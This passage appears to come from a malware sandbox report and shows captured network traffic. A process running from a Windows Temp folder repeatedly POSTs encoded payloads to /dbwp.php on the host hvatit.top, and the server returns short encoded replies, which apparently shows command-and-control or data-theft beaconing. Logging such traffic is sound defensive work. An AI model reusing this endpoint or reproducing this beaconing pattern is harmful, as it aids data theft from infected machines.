                                                        Aug 31, 2024 09:33:09.755610943 CEST2560OUTData Raw: 5a 5e 59 53 5a 5a 55 55 5d 5f 54 57 54 5f 5b 57 5a 57 59 5c 52 5d 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z^YSZZUU]_TWT_[WZWY\R]T^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.X3+$".7:<43':4V$;_'.R+;<(/!]'/Z,
                                                        Aug 31, 2024 09:33:10.086746931 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:10.223743916 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        71192.168.2.44980880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:10.351799011 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        72192.168.2.44980980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:10.542712927 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:10.896100044 CEST1436OUTData Raw: 5f 5f 59 53 5f 5e 50 57 5d 5f 54 57 54 51 5b 50 5a 53 59 59 52 5c 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __YS_^PW]_TWTQ[PZSYYR\T_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-01-+_'#-(_:' <'*#&&'$1?+0<Z'V//!]'/Z,
                                                        Aug 31, 2024 09:33:11.220567942 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:11.349513054 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 1f 33 28 26 56 23 05 25 0b 3e 3c 39 1d 27 0e 2c 07 3b 31 0b 07 29 3a 34 02 2b 3a 2c 12 25 2d 27 07 33 38 04 54 25 06 30 1e 25 24 21 5b 07 10 21 03 32 3d 38 02 3b 05 22 13 32 0e 0c 01 34 31 36 5f 2a 5b 31 59 36 3b 3e 02 27 38 3d 08 2e 39 3e 1e 2a 2d 37 5f 2a 28 3f 06 25 12 2b 50 00 12 25 0a 25 11 12 57 20 2e 21 01 21 16 3f 1f 24 1b 2f 5e 20 15 3f 04 3c 01 3d 52 27 02 2e 12 20 30 3a 02 25 1c 03 05 3e 3d 2c 08 3e 3c 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #3(&V#%><9',;1):4+:,%-'38T%0%$![!2=8;"2416_*[1Y6;>'8=.9>*-7_*(?%+P%%W .!!?$/^ ?<=R'. 0:%>=,><&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        73192.168.2.44981080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:10.662220955 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:11.021065950 CEST2560OUTData Raw: 5a 5b 5c 54 5f 59 50 54 5d 5f 54 57 54 5b 5b 54 5a 53 59 5e 52 5d 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z[\T_YPT]_TWT[[TZSY^R]T[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]$1:B(:$R"Z9?;^"+'')4Q'?[$.9*83(<//!]'/Z,)
                                                        Aug 31, 2024 09:33:11.322673082 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:11.455324888 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        74192.168.2.44981180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:11.584130049 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:11.942998886 CEST2552OUTData Raw: 5f 59 5c 52 5f 5f 50 53 5d 5f 54 57 54 58 5b 57 5a 54 59 5a 52 53 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _Y\R__PS]_TWTX[WZTYZRST]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&!6<">4^-,0"+0 V'&?3=&W<;??< .?!]'/Z,)
                                                        Aug 31, 2024 09:33:12.256383896 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:12.455229044 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        75192.168.2.44981280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:12.583995104 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:12.942960978 CEST2560OUTData Raw: 5a 59 59 54 5a 5c 50 5d 5d 5f 54 57 54 50 5b 53 5a 55 59 53 52 52 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZYYTZ\P]]_TWTP[SZUYSRRT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Z&12A(:#!> _-'#+70 3&?3.>(+#](;V;!]'/Z,
                                                        Aug 31, 2024 09:33:13.276149988 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:13.470848083 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        76192.168.2.44981380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:13.605511904 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:13.958563089 CEST2560OUTData Raw: 5f 5f 5c 56 5a 5d 50 5c 5d 5f 54 57 54 51 5b 56 5a 54 59 5e 52 55 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __\VZ]P\]_TWTQ[VZTY^RUTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Z3!2E=*#".[,?'^ ;&)<V&5'3T*8<?8//!]'/Z,
                                                        Aug 31, 2024 09:33:14.289293051 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:14.489698887 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        77192.168.2.44981480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:14.615854979 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:14.974224091 CEST2560OUTData Raw: 5f 5f 59 5f 5f 59 55 56 5d 5f 54 57 54 5e 5b 54 5a 55 59 5b 52 50 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __Y__YUV]_TWT^[TZUY[RPTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]&2-?8! [.#;+3*;'''-*+ (R,/!]'/Z,=
                                                        Aug 31, 2024 09:33:15.287045956 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:15.485439062 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        78192.168.2.44981580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:15.616501093 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:15.974195004 CEST2560OUTData Raw: 5a 5a 59 5e 5a 5d 50 53 5d 5f 54 57 54 50 5b 56 5a 55 59 5e 52 52 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZZY^Z]PS]_TWTP[VZUY^RRTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.\'!6@?:;5>,-3Z 8'33%$'=>W?;X??,!]'/Z,
                                                        Aug 31, 2024 09:33:16.290431023 CEST25INHTTP/1.1 100 Continue


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        79192.168.2.44981680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:16.371011972 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:16.724250078 CEST1436OUTData Raw: 5f 5e 59 5f 5f 59 50 56 5d 5f 54 57 54 59 5b 54 5a 53 59 53 52 5c 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _^Y__YPV]_TWTY[TZSYSR\TXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-$!1?9,T">:Z04;<S&*V$C#3=*;<<,?!]'/Z,!
                                                        Aug 31, 2024 09:33:17.033657074 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:17.227669001 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 1e 24 06 22 1c 34 3b 2e 55 2a 02 00 0d 24 09 3b 5e 38 0f 00 12 3e 07 23 59 3e 39 3f 0c 24 3d 01 07 33 06 00 12 25 06 37 0e 24 1e 21 5b 07 10 22 10 24 3e 3c 02 3b 12 0f 01 26 0e 25 1d 34 32 25 02 29 13 03 13 22 15 3d 5f 30 3b 21 0c 2c 17 0b 0e 2b 00 05 5f 29 28 20 5a 26 02 2b 50 00 12 25 09 25 59 20 11 20 2d 39 03 22 3b 2b 1e 27 0b 3b 59 22 2b 06 5a 29 3b 29 54 27 2f 2d 0f 20 33 2d 59 31 54 2d 04 3c 07 2f 51 2a 2c 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #$"4;.U*$;^8>#Y>9?$=3%7$!["$><;&%42%)"=_0;!,+_)( Z&+P%%Y -9";+';Y"+Z);)T'/- 3-Y1T-</Q*,&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        80192.168.2.44981780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:16.489413023 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:16.833585024 CEST2560OUTData Raw: 5a 58 59 50 5a 5c 55 57 5d 5f 54 57 54 50 5b 53 5a 5c 59 59 52 53 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZXYPZ\UW]_TWTP[SZ\YYRST]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.&29=)?!._./77;(09;'?X&.:S<3^? //!]'/Z,
                                                        Aug 31, 2024 09:33:17.155603886 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:17.357213020 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        81192.168.2.44981880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:17.478358030 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:17.840650082 CEST2560OUTData Raw: 5a 55 59 5e 5f 58 55 50 5d 5f 54 57 54 5d 5b 54 5a 52 59 5a 52 54 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZUY^_XUP]_TWT][TZRYZRTTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-0:D? ".(_-,8#;$*0V0'="R+<?,!]'/Z,1
                                                        Aug 31, 2024 09:33:18.162486076 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:18.295625925 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        82192.168.2.44981980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:18.411695957 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:18.771070004 CEST2560OUTData Raw: 5a 5c 59 54 5a 55 55 52 5d 5f 54 57 54 5c 5b 53 5a 50 59 58 52 5d 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\YTZUUR]_TWT\[SZPYXR]TYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-0:D<S5X8].'4;;'70%?'[=?#Y?(/!]'/Z,5
                                                        Aug 31, 2024 09:33:19.076108932 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:19.555448055 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        83192.168.2.44982080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:19.680013895 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:20.036715031 CEST2560OUTData Raw: 5a 5d 59 50 5a 5c 50 57 5d 5f 54 57 54 59 5b 56 5a 5c 59 5a 52 52 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z]YPZ\PW]_TWTY[VZ\YZRRTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'-+T">,- ;3)?$6?X3=*?++_+?$;/!]'/Z,!
                                                        Aug 31, 2024 09:33:20.345278025 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:20.476279974 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        84192.168.2.44982180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:20.623389006 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:20.974221945 CEST2560OUTData Raw: 5a 5c 59 5e 5f 5d 50 5d 5d 5f 54 57 54 5b 5b 53 5a 56 59 5b 52 50 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\Y^_]P]]_TWT[[SZVY[RPT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-01E+#!> ^:?$ + U09<W0&83.-<;?X+'8?!]'/Z,)
                                                        Aug 31, 2024 09:33:21.306494951 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:21.503901958 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
